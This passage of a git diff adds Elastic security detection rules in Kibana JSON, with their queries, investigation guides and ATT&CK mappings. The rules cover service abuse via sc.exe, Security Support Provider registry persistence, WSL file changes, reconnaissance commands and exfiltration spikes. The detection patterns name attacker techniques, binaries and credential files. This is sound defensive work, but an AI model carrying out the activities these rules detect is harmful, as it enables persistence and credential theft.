can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.008", + "name": "/etc/passwd and /etc/shadow", + "reference": "https://attack.mitre.org/techniques/T1003/008/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "e7cb3cfd-aaa3-4d7b-af18-23b89955062c_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_206.json b/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_206.json new file mode 100644 index 00000000000..8df99cac0fe --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_206.json @@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies when an AWS Route Table has been modified or deleted.", + "false_positives": [ + "Route Table could be modified or deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Route Table being modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. Also automated processes that use Terraform may lead to false positives." + ], + "from": "now-60m", + "index": [ + "filebeat-*", + "logs-aws*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "name": "AWS Route Table Modified or Deleted", + "note": "", + "query": "event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:(ReplaceRoute or ReplaceRouteTableAssociation or\nDeleteRouteTable or DeleteRoute or DisassociateRouteTable) and event.outcome:success\n", + "references": [ + "https://github.com/easttimor/aws-incident-response#network-routing", + "https://docs.datadoghq.com/security_platform/default_rules/aws-ec2-route-table-modified/", + "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ReplaceRoute.html", + "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ReplaceRouteTableAssociation", + "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DeleteRouteTable.html", + "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DeleteRoute.html", + "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisassociateRouteTable.html" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "e7cd5982-17c8-4959-874c-633acde7d426", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Use Case: Network Security Monitoring", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "e7cd5982-17c8-4959-874c-633acde7d426_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_108.json b/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_108.json new file mode 100644 index 00000000000..40ea2ff322e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_108.json @@ -0,0 +1,179 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies Service Control (sc.exe) spawning from script interpreter processes to create, modify, or start services. This can potentially indicate an attempt to elevate privileges or maintain persistence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "logs-system.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Service Control Spawned via Script Interpreter", + "note": "## Triage and analysis\n\n### Investigating Service Control Spawned via Script Interpreter\n\nWindows services are background processes that run with SYSTEM privileges and provide specific functionality or support to other applications and system components.\n\nThe `sc.exe` command line utility is used to manage and control Windows services on a local or remote computer. Attackers may use `sc.exe` to create, modify, and start services to elevate their privileges from administrator to SYSTEM.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the command line, registry changes events, and Windows events related to service activities (for example, 4697 and/or 7045) for suspicious characteristics.\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is not inherently malicious if it occurs in isolation. As long as the analyst did not identify suspicious activity related to the user, host, and service, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "/* This rule is not compatible with Sysmon due to user.id issues */\n\nprocess where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"sc.exe\" or process.pe.original_file_name == \"sc.exe\") and\n process.parent.name : (\"cmd.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\",\n \"wmic.exe\", \"mshta.exe\",\"powershell.exe\", \"pwsh.exe\") and\n process.args:(\"config\", \"create\", \"start\", \"delete\", \"stop\", \"pause\") and\n /* exclude SYSTEM SID - look for service creations by non-SYSTEM user */\n not user.id : \"S-1-5-18\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "e8571d5f-bea1-46c2-9f56-998de2d3ed95", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + }, + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + }, + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.010", + "name": "Regsvr32", + "reference": "https://attack.mitre.org/techniques/T1218/010/" + }, + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "e8571d5f-bea1-46c2-9f56-998de2d3ed95_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_107.json b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_107.json new file mode 100644 index 00000000000..1d1fd107848 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_107.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies registry modifications related to the Windows Security Support Provider (SSP) configuration. Adversaries may abuse this to establish persistence in an environment.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Installation of Security Support Provider", + "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\Security Packages*\",\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\Security Packages*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages*\"\n ) and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\", \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e86da94d-e54b-4fb5-b96c-cecff87e8787", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.005", + "name": "Security Support Provider", + "reference": "https://attack.mitre.org/techniques/T1547/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "e86da94d-e54b-4fb5-b96c-cecff87e8787_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_108.json b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_108.json new file mode 100644 index 00000000000..d7b9f6ddd0d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_108.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies registry modifications related to the Windows Security Support Provider (SSP) configuration. Adversaries may abuse this to establish persistence in an environment.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Installation of Security Support Provider", + "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\Security Packages*\",\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\Security Packages*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages*\"\n ) and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\", \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e86da94d-e54b-4fb5-b96c-cecff87e8787", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.005", + "name": "Security Support Provider", + "reference": "https://attack.mitre.org/techniques/T1547/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "e86da94d-e54b-4fb5-b96c-cecff87e8787_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_6.json b/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_6.json new file mode 100644 index 00000000000..fadff4f662e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_6.json @@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects files creation and modification on the host system from the the Windows Subsystem for Linux. Adversaries may enable and use WSL for Linux to avoid detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Host Files System Changes via Windows Subsystem for Linux", + "query": "sequence by process.entity_id with maxspan=5m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"dllhost.exe\" and \n /* Plan9FileSystem CLSID - WSL Host File System Worker */\n process.command_line : \"*{DFB65C4C-B34F-435D-AFE9-A86218684AA8}*\"]\n [file where host.os.type == \"windows\" and process.name : \"dllhost.exe\" and not file.path : \"?:\\\\Users\\\\*\\\\Downloads\\\\*\"]\n", + "references": [ + "https://github.com/microsoft/WSL" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e88d1fe9-b2f4-48d4-bace-a026dc745d4b", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1202", + "name": "Indirect Command Execution", + "reference": "https://attack.mitre.org/techniques/T1202/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "e88d1fe9-b2f4-48d4-bace-a026dc745d4b_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_105.json b/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_105.json new file mode 100644 index 00000000000..a2d689b4ab9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_105.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of several commonly used system commands executed by a previously unknown executable located in commonly abused directories. An alert from this rule can indicate the presence of potentially malicious activity, such as the execution of unauthorized or suspicious processes attempting to run malicious code. Detecting and investigating such behavior can help identify and mitigate potential security threats, protecting the system and its data from potential compromise.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious System Commands Executed by Previously Unknown Executable", + "new_terms_fields": [ + "host.id", + "user.id", + "process.executable" + ], + "query": "host.os.type:linux and event.category:process and event.action:(exec or exec_event or fork or fork_event) and \nprocess.executable:(\n /bin/* or /usr/bin/* or /usr/share/* or /tmp/* or /var/tmp/* or /dev/shm/* or\n /etc/init.d/* or /etc/rc*.d/* or /etc/crontab or /etc/cron.*/* or /etc/update-motd.d/* or \n /usr/lib/update-notifier/* or /home/*/.* or /boot/* or /srv/* or /run/*) \n and process.args:(whoami or id or hostname or uptime or top or ifconfig or netstat or route or ps or pwd or ls) and \n not process.name:(sudo or which or whoami or id or hostname or uptime or top or netstat or ps or pwd or ls or apt or \n dpkg or yum or rpm or dnf or dockerd or docker or snapd or snap) and\n not process.parent.executable:(/bin/* or /usr/bin/* or /run/k3s/* or /etc/network/* or /opt/Elastic/*)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "e9001ee6-2d00-4d2f-849e-b8b1fb05234c", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 105 + }, + "id": "e9001ee6-2d00-4d2f-849e-b8b1fb05234c_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e92c99b6-c547-4bb6-b244-2f27394bc849_3.json b/packages/security_detection_engine/kibana/security_rule/e92c99b6-c547-4bb6-b244-2f27394bc849_3.json new file mode 100644 index 00000000000..0e79bda6675 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e92c99b6-c547-4bb6-b244-2f27394bc849_3.json @@ -0,0 +1,60 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected high bytes of data written to an external device via Airdrop. In a typical operational setting, there is usually a predictable pattern or a certain range of data that is written to external devices. An unusually large amount of data being written is anomalous and can signal illicit data copying or transfer activities.", + "from": "now-2h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "ded_high_bytes_written_to_external_device_airdrop", + "name": "Spike in Bytes Sent to an External Device via Airdrop", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/ded", + "https://www.elastic.co/blog/detect-data-exfiltration-activity-with-kibanas-new-integration" + ], + "related_integrations": [ + { + "package": "ded", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": "e92c99b6-c547-4bb6-b244-2f27394bc849", + "setup": "## Setup\n\nThe rule requires the Data Exfiltration Detection integration assets to be installed, as well as network and file events collected by integrations such as Elastic Defend and Network Packet Capture (for network events only). \n\n### Data Exfiltration Detection Setup\nThe Data Exfiltration Detection integration detects data exfiltration activity by identifying abnormalities in network and file events. Anomalies are detected using Elastic's Anomaly Detection feature. \n\n#### Prerequisite Requirements:\n- Fleet is required for Data Exfiltration Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- File events collected by the Elastic Defend integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Data Exfiltration Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Data Exfiltration Detection and select the integration to see more details about it.\n- Under Settings, click Install Data Exfiltration Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Data Exfiltration Detection, you'll need to enable the corresponding Anomaly Detection jobs. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your file events. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/ded/kibana/ml_module/ded-ml.json) configuration file, you will see a card for Data Exfiltration Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Data Exfiltration Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Exfiltration" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1011", + "name": "Exfiltration Over Other Network Medium", + "reference": "https://attack.mitre.org/techniques/T1011/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "e92c99b6-c547-4bb6-b244-2f27394bc849_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_110.json 